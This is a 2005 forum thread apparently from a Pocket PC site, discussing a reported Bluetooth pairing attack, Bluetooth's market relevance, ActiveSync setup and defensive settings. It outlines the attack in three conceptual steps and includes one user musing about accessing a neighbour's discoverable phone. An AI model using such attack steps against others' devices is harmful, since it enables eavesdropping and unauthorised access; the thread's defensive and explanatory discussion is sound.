<div class='os_post_top_link'><a href='http://www.newscientist.com/article.ns?id=dn7461&feedId=online-news_rss20' target='_blank'>http://www.newscientist.com/article...line-news_rss20</a><br /><br /></div><i>"Cryptographers have discovered a way to hack Bluetooth-enabled devices even when security features are switched on. The discovery may make it even easier for hackers to eavesdrop on conversations and charge their own calls to someone else’s cellphone. Bluetooth is a protocol that allows different devices including phones, laptops, headsets and printers to communicate wirelessly over short ranges - typically between 10 and 100 metres. Over the past few years security experts have devised many ways of hacking into Bluetooth communications, but most require the Bluetooth security features to be switched off. In April 2004, UK-based Ollie Whitehouse, at that time working for security firm @Stake, showed that even Bluetooth devices in secure mode could be attacked. His method allowed someone to hijack the phone, giving them the power to make calls as if it were in their own hands."</i><br /><br /><img src="http://www.pocketpcthoughts.com/images/web/2003/wey-20050604-CrackedTooth.gif" /><br /><br />A couple of bright experts at Tel Aviv University have exposed the latest Bluetooth vulnerability. Step 1 - spoof one of the device's personal IDs (easily done as all discoverable Bluetooth devices broadcast this to any other Bluetooth-enabled device in sight). Step 2 - send a "forget" message (this prompts the other device to discard the original key and to create a new one to initiate a new paired session). Step 3 - you're in! All this in just 0.06 seconds. :roll:

Time for them to start on Bluetooth encryption *shudder* still it sounds like you have to be using the bluetooth and the second device at the time they are trying to crack so in my everyday useage it would be very infrequently I would be able to be "hacked"

Another question is how "hackable" is it as far as the profile useage. I mean if you have something useing a bluetooth headset profile is that as valuable as a person who is using a serial port profile?

I had to double-check. I though Ed had posted this. :wink:

I had to double-check. I though Ed had posted this. :wink:

He still posted (http://www.pocketpcthoughts.com/forums/viewtopic.php?t=40574) on something blue anyway. ;)

Do you guys think it's really a good idea to be telling anyone and everyone how to perform this hack????

Do you guys think it's really a good idea to be telling anyone and everyone how to perform this hack????

This is more about "concept" than applying it in a "real-world scenario". It has already been published in New Scientist and a few other websites, so I don't think the world is immune to it. Besides, it's better to look at this article from the perspective that it's educating the community about the latest Bluetooth vulnerability and helping them to take necessary steps to prevent such attacks, rather than the perspective of telling them how they can use it to hack into their next-door neighbour's Bluetooth device. ;)

helping them to take necessary steps to prevent such attacks
... like leaving their devices non-discoverable whenever possible. While it makes things like beaming business cards hard, that may be the cost for now until the model becomes more robust over time.

At least, I hope that works.

--janak

I really laughed out loud about this one. I've been a bluetooth detractor from day one. It has been geeky ideas like Bluetooth that lost Ericsson the mobile phone market. While they were looking up their backsides over developing this largely irrelevant technology Nokia was walking away with the mobile phone market with the press-on cover. Hardly hi-tech but definitely marketing-lead rather than technology-lead. There is a lesson in there for all you readers who marvel at the latest technology. It may be cool but someone has got to buy it.

Anyway, that aside. I recently purchased a new SD reader and I was offered at the same time a cheap BT USB adapator. Why not? I thought and purchased it for a laugh.

I plugged it in and happily searched for devices to link to. Apart from my JAM, I was impressed that the adaptor had the power to pick up my wife's T610 which was in her handbag but still in the same room. But I also noticed a third Nokia handset in the link list. Now, I don't own a Nokia BT handset, and neither does anyone in my family. My conclusion was that this had to be a handset from my neighbours, next door. I live in a small terrace house and my PC desk in next to my neighbours party wall. I've never known a BT adaptor to be powerful enough to penetrate walls but, hey, this rougue device was definitely in the neighbourhood.

What really amused me was that when I then requested a list of services supported by devices in the BT neighbourhood the list included Nokia Data Suite. I'm sure most of you know that Data Suite can be used to transfer data to/from the BT handset.

I do happen to have a copy of Nokia Data Suite but as of yet I have not had either the time or interest to pursue this opportunity.

To be fair, I assume that whoever owns this handset is either unaware that the BT is turned on, or unaware how easy it is to detect and potentially interract with the handset.

Encryption for BT? Why bother!

Sounds cool. If anyone does happen to find that interesting piece of software, I for one would love a copy ;-)

And people wonder why I never store sensitive data on PPC's and BT phones - here's your answer folks.

I really laughed out loud about this one. I've been a bluetooth detractor from day one. It has been geeky ideas like Bluetooth that lost Ericsson the mobile phone market. While they were looking up their backsides over developing this largely irrelevant technology Nokia was walking away with the mobile phone market with the press-on cover. Hardly hi-tech but definitely marketing-lead rather than technology-lead. There is a lesson in there for all you readers who marvel at the latest technology. It may be cool but someone has got to buy it.

Largely irrelevant technology? I don't know but I'm willing to bet that the people who actually have the money to spend on unsubsidized phone and PDA purchases would rather have an easy system for wireless headsets, wireless modems and wireless sync'ing than press-on covers. In fact, I'd be willing to bet they are extremely uninterested in press-on covers.

Just because the US Market is just now starting to be interested in BT doesn't mean that this was the same everywhere else in the world. 2 years ago BT was becoming popular in Europe and Asia. Call me crazy, but that makes it "cool" and meets the "Someone has got to buy it" requirement.

Today's news is fairly uneventful in the scheme of Bluetooth. All technolgies eventually are hacked, and many, if not all, simply devise new methods to secure themselves. Bluetooth, as much as you'd like to believe otherwise, is gaining popularity and usage. Time to admit that in the long run, it can become the market leader whereas press-on covers were only good for a few short years.

I'm willing to bet that the people who actually have the money to spend on unsubsidized phone and PDA purchases would rather have an easy system for wireless headsets, wireless modems and wireless sync'ing than press-on covers. In fact, I'd be willing to bet they are extremely uninterested in press-on covers.

I'd be happy to take that bet. The majority of phone purchasers have no idea what bluetooth is or what it is for. If you offer them a case or a free car charger it is more likely to clinch the purchase. At forums like this we have a very distorted image of the mass market and its desires because the majority of visitors and activists here are highly technical and early adopters.

As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????

As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????
You can't blame that on the technology, though; that particular "problem" is due to the implementation of the technology. Bluetooth syncing is a pain to setup and a hassle to use because the functionality was was kinda tacked onto an already limited software system -- namely, ActiveSync. There are plenty of Bluetooth applications that work very seamlessly and very easily. Once I pair my Bluetooth GPS receiver with my iPAQ, for example, it just works. Wireless, hassle-free, and no bizarre jumping through hoops to make it work. A buddy's Bluetooth headset is the same. Once paired with his phone, it simply works.

I'm willing to bet that the people who actually have the money to spend on unsubsidized phone and PDA purchases would rather have an easy system for wireless headsets, wireless modems and wireless sync'ing than press-on covers. In fact, I'd be willing to bet they are extremely uninterested in press-on covers.

I'd be happy to take that bet. The majority of phone purchasers have no idea what bluetooth is or what it is for. If you offer them a case or a free car charger it is more likely to clinch the purchase. At forums like this we have a very distorted image of the mass market and its desires because the majority of visitors and activists here are highly technical and early adopters.

As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????

Notice how I said "unsubsidized". Kids and non-business consumers who sign up for 2 year contracts (Thus getting a subsidized phone, as the carrier is giving deep discounts to get them for 2 years) could care less about BT. Businesses who are going to be buying phones for their employees, or mobile executives who are likely to pay to have the exact phone they want will explore the options, find Bluetooth a lot more promising than changing the look of their phone, and go with it.

As for BT activesync, I must be the only person in the world that doesn't suffer from problems with it. I did have one issue, and that was my Activesync liked to try to always connect as soon as it started to COM1 or some other non-BT COM port. I'd then get error messages, etc.. I found a registry key that quickly fixed that problem. After I imported the following into my Registry, I haven't had any problems since (Note, replace the COM5 with whatever COM port you use to Activesync over BT)

[HKEY_CURRENT_USER\Software\Microsoft\Windows CE Services]
"SerialPort"="COM5"

"Step 2 - send a "forget" message (this prompts the other device to discard the original key and to create a new one to initiate a new paired session)."

Don't all bluetooth phones require a confirmation on both sides on any new security code or does this let the security code get replaced without confirmation?

Whitehouse showed in 2004 that a hacker could arrive at this link key without knowing the PIN using a piece of equipment called a Bluetooth sniffer. This can record the exchanged messages being used to derive the link key and feed the recordings to software that knows the Bluetooth algorithms and can cycle through all 10,000 possibilities of the PIN. Once a hacker knows the link keys, Whitehouse reasoned they could hijack the device
Ummm... they seem to be assuming that the PIN is always 4 digits. Bluetooth PINs can be longer, though a lot of devices only use 4 digits. The connections between my PPC, computer, laptop, and phone all use 6, 7, or 8 digit PINs.

"Step 2 - send a "forget" message (this prompts the other device to discard the original key and to create a new one to initiate a new paired session)."

Don't all bluetooth phones require a confirmation on both sides on any new security code or does this let the security code get replaced without confirmation?Problem is that the victims phone ASSUMES it is talking to a known device (the MAC-afress of the sender is spoofed). Because of this the device trusts the action and responds to it accordingly. It should not trust such a message and indeed require confirmation.

jaap

[quote]

As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????

Face it, anything that uses a Microsoft OS does not play all that well with BT. Bluetooth was not Microsoft's idea and I guess they can't buy it (I am sure they tried) so they basically ignored it for the past several years. Even the new implementation of BT in WinXP/SP2 has caused more trouble than it was worth.

All of my non-MS driven devices have worked flawlessly using BT, including; 3 Sony-Ericsson phones, 2 Motorola phones, 2 BT built-in car kits (both SE and Moto), several portable BT headsets and hands free devices. The interaction between my iPAQ's and BT devices have not always been smooth, but things are getting better (I paired my hx4700 and RAZR this week in less than a minute).

So if you want a pleasant BT experience, keep MS out of the picture and you too may see the light.

I really laughed out loud about this one. I've been a bluetooth detractor from day one. It has been geeky ideas like Bluetooth that lost Ericsson the mobile phone market. While they were looking up their backsides over developing this largely irrelevant technology Nokia was walking away with the mobile phone market with the press-on cover.

It's interesting to note that there appear to be many more handsets being produced these days with Bluetooth than with interchangable covers.

Certainly in countries like the UK where hands-free is a legal requirement whilst driving, Bluetooth has taken off in a big way as it's the only sensible way to connect a headset to a phone in a car. Personally I love to be able to get into my car, keeping my phone snug in my pocket and the car automatically pairs with my phone, accesses my SIM, uses my external antenna for higher-quality communication and I get a mic on my A-pillar and it even mutes the stereo when a call comes in.

I even use Bluetooth in the gym - I keep my Pocket PC tucked away playing my music which it sends to my Bluetooth headphones as I got pretty frustrated always knocking out the cable with my wired ones.

And I couldn't imagine having to find a cable and muck around with specific drivers and software just to get all the photos off my phone either.

Nearly everyone I know uses Bluetooth in some way on a daily basis, and my friends aren't just geeks. I realise its primary application (wireless headset in car) might not have such a great need in the USA though due to the differences in driving from other countries, e.g. mostly automatics (no need to change gear), easier, though less efficient road junctions, such as intersections vs. roundabouts.

Still, I would say it's a highly relevant technology which is completely indispensible.

As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????
You can't blame that on the technology, though; that particular "problem" is due to the implementation of the technology.

This makes perfectly good sense..........if you're a techie. Like it or not, Biglouie has a very good point. Maybe BT is not a technology in search of people, but it will NEVER enjoy widespread appeal in this country (the largest market in the world by far) as long as there are "implementation" issues like you describe.

I like the idea of BT and am about to make my 1st foray into this growing technology. But if I have to worry about "stacks" and "compatibility", and if it doesn't work as seamlessly as my wireless wifi, I'm out. Never to be seen again.

but it will NEVER enjoy widespread appeal in this country (the largest market in the world by far)
You apparently haven't been paying attention to the Asian market if you think the US is significant in handeld and portable technology.

and if it doesn't work as seamlessly as my wireless wifi, I'm out
Glad ylou have good luck with Wifi. I would suggest that that technology has as many pitfals and problems for the average consumer as BT. I would bet that the average person with a decent set of instructions could get BT AS working long before doing so over an Adhoc Wifi Connection.

It has been geeky ideas like Bluetooth that lost Ericsson the mobile phone market.
My opinion is that Ericsson never really pushed hard in the mobile phone market. Their core business has always been in network equipments rather than end-user handsets. Nokia, on the other hand, is a handset company. That they were market leader, is logical.

As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????
A bad implementation could ruin a good technology. When Bluetooth was designed, the primary usage scenario was handset-headset connection. And sure enough the first implementation was also in handset and headset to realize this scenario. So to see how "easy" it is supposed to be, take a look at this usage scenario.

and if it doesn't work as seamlessly as my wireless wifi, I'm out

Glad ylou have good luck with Wifi. I would suggest that that technology has as many pitfals and problems for the average consumer as BT. I would bet that the average person with a decent set of instructions could get BT AS working long before doing so over an Adhoc Wifi Connection.

That's a fair point if it's true. For someone as technologically challenged as I am to set up a wireless home network with little difficulty, well I just assumed it was easy for all. Besides, I read the horror stories on this site about BT (and not just from EH :wink: ) all the time. Can't recall reading many about wireless wifi.

My luck with wireless includes syncing with AS. As a matter of fact, if I interpreted what I read correctly, and the next version of PPC software does NOT allow wireless AS sync, then this will DEFINITELY be my last PPC. I've become that dependant on my wireless AS sync. It works flawlessly and was very easy. Given my experience, and what I've read (mostly on this site) I find your implication that BT is just as easy to comprehend and set-up for the average consumer as wifi hard to believe.

For someone as technologically challenged as I am to set up a wireless home network with little difficulty, well I just assumed it was easy for all.
Of course, the point of this thread is security. I assume (perhaps wrongly) that if you set up a Wi-Fi netowrk at home "with little difficulty" you didn't bother to secure it. If you used the minimum of a WAP key, that can be broken much faster than Bluetooth. If you used anything with reasonable security such as 802.11x, then you are far more technologically focused than you let on.

As for this particular bug in Bluetooth security: some perspective is in order: many Bluetooth devices do not remain discoverable for more than a few minutes (or the user can optionally turn off discovery mode - which I recommend.) This would easily prevent the hack. Second, even if a hacker does change the key, the user will discover the problem as soon as they try to use their own Bluetooth device. Thus, while it should not be ignored, this hack is not as dangerous as they very easy access to Wi-Fi afforded to hackers and non-hackers alike. (Since most Wi-Fi networks are completely open, anyone using Windows XP can automatically connect to such networks with no technical skills at all.)

Quite. Pair your devices and then tuirn off discoverable mode. Sacrificing the convenience of ad-hoc BT connections for a ton of security and much lower power consumption, is a very good trade-off.

You'd be surprised how much extra power is consumed by remaining discoverable. I've been operating my BT devices (mobile phones, PDAs, GPS, Headset, mice, keyboards, the list goes on) this way for as long as I can remember, just for this reason.

Use long PINs when pairing - at least 8 digits. Turn-on confirmation prompts (authorisation required) and use encryption - BT already suppports it.

Personally I would like to see BT devices shipped with everything secured - but then very few people would discover and use the features. Same as Wifi - out of the box it's unsecured.